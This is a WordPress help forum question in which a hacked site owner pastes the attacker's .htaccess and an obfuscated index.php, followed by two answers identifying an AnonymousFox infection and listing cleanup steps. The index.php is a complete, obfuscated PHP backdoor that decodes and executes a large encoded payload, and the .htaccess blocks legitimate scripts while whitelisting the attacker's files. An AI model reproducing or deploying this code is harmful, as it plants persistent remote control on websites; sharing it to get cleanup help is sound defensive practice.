Question 30432 in Wordpress Question posted in
The official Wordpress documentation can be found here.

How to block modification of .htaccess file wordpress

please tell me what can I do to protect my .htaccess file ? Recently I was hacked and I noticed that I can navigate into different place of my wp-admin (Posts, settings, plugins,…) they show permission page – forbiden. A .htaccess is generate and also an index.php and themes.php is added to root. I’ve deleted the .htaccess file, index.php and themes.php and I’ve created a new .htaccees which content many lines of protection rules, but it’s always replaced by a new. How can I track the hacked script please ?

Code of hacked .htaccess:

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

Code of index.php:

<?php $zdHKDPrQNF='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$zdHKDPrQNF[(105/15)].$zdHKDPrQNF[(26-1)].$zdHKDPrQNF[(1*49)].$zdHKDPrQNF[((10*1)+18)].$zdHKDPrQNF[(14+22)].$zdHKDPrQNF[(44+5)].$zdHKDPrQNF[(44-13)].$zdHKDPrQNF[(684/18)].$zdHKDPrQNF[(23+4)].$zdHKDPrQNF[(72-(33-7))].$zdHKDPrQNF[(154/22)].$zdHKDPrQNF[(11+25)].$zdHKDPrQNF[(65-(62-31))].$zdHKDPrQNF[(26-6)].$zdHKDPrQNF[((27*2)-8)];$pHFdNhg9688=$zdHKDPrQNF[(20-9)].$zdHKDPrQNF[(2*4)].$zdHKDPrQNF[(29*1)].$zdHKDPrQNF[(160/4)];$MYtraky2482=$zdHKDPrQNF[(8*5)].$zdHKDPrQNF[((1+0)+2)].$zdHKDPrQNF[(6+(1*(95/19)))].$zdHKDPrQNF[(140/5)].$zdHKDPrQNF[(522/18)].$zdHKDPrQNF[(7*((7-3)-2))].$zdHKDPrQNF[(2*14)].$zdHKDPrQNF[(138/(2+4))].$zdHKDPrQNF[(1029/(378/18))].$zdHKDPrQNF[((2*189)/9)].$zdHKDPrQNF[(12+(0+0))].$zdHKDPrQNF[(31*1)].$zdHKDPrQNF[(48/(36/12))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+7)].$zdHKDPrQNF[(18+2)].$zdHKDPrQNF[(18-(10/5))].$zdHKDPrQNF[(735/15)].$zdHKDPrQNF[(0+(2-(1*1)))].$zdHKDPrQNF[(16-(3+(36/(0+18))))].$zdHKDPrQNF[((167-23)/18)].$zdHKDPrQNF[(0+(18-9))].$zdHKDPrQNF[(1*3)].$zdHKDPrQNF[(11*(1+(0/(78/13))))].$zdHKDPrQNF[(2*7)].$zdHKDPrQNF[(29*(0+1))].$zdHKDPrQNF[(38-(8+9))].$zdHKDPrQNF[(15*2)].$zdHKDPrQNF[(45-11)].$zdHKDPrQNF[(1*46)].$zdHKDPrQNF[(1*(17+21))].$zdHKDPrQNF[(78/3)].$zdHKDPrQNF[(21+(77/11))].$zdHKDPrQNF[(22+14)].$zdHKDPrQNF[(343/(91/13))].$zdHKDPrQNF[(1*1)].$zdHKDPrQNF[(21-10)].$zdHKDPrQNF[(22+(12/2))].$zdHKDPrQNF[(180/20)].$zdHKDPrQNF[(3+((0+0)*1))].$zdHKDPrQNF[(686/(126/9))].$zdHKDPrQNF[(61-(32-8))].$zdHKDPrQNF[(476/17)].$zdHKDPrQNF[((4-0)+22)].$zdHKDPrQNF[(((23-(2*5))/13)-0)].$zdHKDPrQNF[(7+(84/21))].$zdHKDPrQNF[(28/2)].$zdHKDPrQNF[(9-0)].$zdHKDPrQNF[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Tags:

2

Answers


  1. 0

    This is an AnonymousFox hack. It is very sophisticated. See these steps to clean your hacked hosting account > https://forum.ait-pro.com/forums/topic/wp-dester-and-wpyii2-hacker-plugins/

    Login or Signup to reply.
  2. 0
    1. Create lock666.php as a folder
    2. Check if there is a suspicious cron job, delete it if any.
    3. remove all newly created .htaccess file
    4. remove all license.txt files
    5. remove all suspicious new .php file
      random file name

    if after creating the "lock666.php" folder you can’t edit the .htaccess and index.php files, rename them to the ones in the hacked .htaccess file

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search